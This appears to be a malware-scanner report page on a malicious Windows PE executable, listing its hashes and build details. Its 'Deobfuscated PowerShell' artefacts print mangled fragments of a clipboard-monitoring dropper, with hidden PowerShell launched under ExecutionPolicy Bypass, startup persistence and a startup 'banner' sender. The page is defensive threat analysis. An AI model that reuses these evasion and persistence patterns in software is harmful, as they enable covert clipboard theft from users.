Malicious

eef3cf31bb13fdc60ef08cd45379392d

Share on LinkedIn Add to favorites

PE Executable

MD5: eef3cf31bb13fdc60ef08cd45379392d

Size: 200.7 KB

application/x-dosexec

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	eef3cf31bb13fdc60ef08cd45379392d
Sha1	b6aff94a80c60bac2a5e611d60e636603b5ce7d9
Sha256	e2167e5191c46e91b9a73fe36e18f8be93bdabb0435975b61925b26930e3ca7c
Sha384	2252864f5c5b1c6af354371195680f420205fcf2d498aa0c9571d6b4f035477ab12d357794f2734b9d3b476ebbe85435
Sha512	35e06ccc5ef30edcebfbc094b492b016c8f12e3d1596da3ccf76e919b4b5928a7bd7c652b5afcdb74ec488aa8c7056f231d0151d4a996969a8be7c5d1d1424e5
SSDeep	3072:/RLiJRaxQRsgLY1c5GWp1icKAArDZz4N9GhbkrNEkkZFbxwy:c3axQpFp0yN90QE1v
TLSH	4E146B0923E91192F4B26B7099F602834E367CA3AB7582FF1784957E0D33AC49975F63

PeID

Microsoft Visual C++ 8.0 (DLL)

File Structure

Informations

Name	Value
Info	PE Detect: PeReader OK (file layout)
Info	PDB Path: wextract.pdb

Artefacts

Name	Value
URLs in VB Code - #1	http://schemas.microsoft.com/windows/2004/02/mit/task
URLs in VB Code - #2	https://api.t
Deobfuscated PowerShell	& var_51 & @(""", 0, [Unmanaged(ErrorExpressionAst)] ,) false end "Sub" [Unmanaged(ErrorStatementAst)] function IsalReadyRunnIng() on "Error" "Resume" "Next" dim @("var_45", "var_46", "var_47") var_47 "=" 0 set "var_45" "=" "var_5.ExecQuery" "SELECT * FROM Win32_Process WHERE Name='powershell.exe'" [Unmanaged(ErrorStatementAst)] for each "var_46" "In" "var_45" [Unmanaged(ErrorStatementAst)] if instr (@(1, [Unmanaged(ErrorExpressionAst)] ,)) @("var_46.commAndLine", "clip_mon.ps1", 1) > 0 "Then" var_47 "=" 1 end "If" next "var_46" isalreadyrunning "=" "True" end "Function"
Deobfuscated PowerShell	powershell "silently" "in" "background" (sta "mode" "required" "for" "Clipboard") wshshell.run "powershell -WindowStyle Hidden -Sta -NoProfile -ExecutionPolicy Bypass -File "" & psfile & @(""", 0, [Unmanaged(ErrorExpressionAst)] ,) false end "Sub" " ============================================================= " entry "POINT" " ============================================================= If IsAlreadyRunning() Then WScript.Quit AddToStartup SendStartupBanner StartMonitor Set WshShell = Nothing : Set objFSO = Nothing : Set objWMIService = Nothing"
Deobfuscated PowerShell	silently in background (sta mode required for clipboard) wshshell.run powershell -WindowStyle "Hidden" -Sta -NoProfile -ExecutionPolicy "Bypass" -File "" & psfile & @({ "", 0, [Unmanaged(ErrorExpressionAst)] ,) false end " sub "=============================================================" " entry " point "=============================================================" [Unmanaged(ErrorStatementAst)] if isalreadyrunning ([Unmanaged(ErrorStatementAst)] ) "Then" "WScript.Quit" addtostartup sendstartupbanner startmonitor set "WshShell" "=" "Nothing" ":" "Set" "objFSO" "=" "Nothing" ":" "Set" "objWMIService" "=" "Nothing" } )
Deobfuscated PowerShell	[Unmanaged(ErrorExpressionAst)] "Hidden" -Sta -noprofile -ExecutionPolicy "Bypass" -File "" & psfile & @("", 0, [Unmanaged(ErrorExpressionAst)] [Unmanaged(ErrorExpressionAst)] ,) false end " sub " "============================================================= " entry " point " "============================================================= [Unmanaged(ErrorStatementAst)] if isalreadyrunning ([Unmanaged(ErrorStatementAst)] ) Then WScript.Quit addtostartup sendstartupbanner startmonitor set WshShell = Nothing : Set objFSO = Nothing : Set objWMIService = Nothing } )"
Deobfuscated PowerShell	psfile & @({ "", 0, [Unmanaged(ErrorExpressionAst)] ,) false end " sub "=============================================================" " entry " point "=============================================================" [Unmanaged(ErrorStatementAst)] if isalreadyrunning ([Unmanaged(ErrorStatementAst)] ) "Then" "WScript.Quit" addtostartup sendstartupbanner startmonitor set "WshShell" "=" "Nothing" ":" "Set" "objFSO" "=" "Nothing" ":" "Set" "objWMIService" "=" "Nothing" } )

eef3cf31bb13fdc60ef08cd45379392d (200.7 KB)

An error has occurred. This application may no longer respond until reloaded. Reload 🗙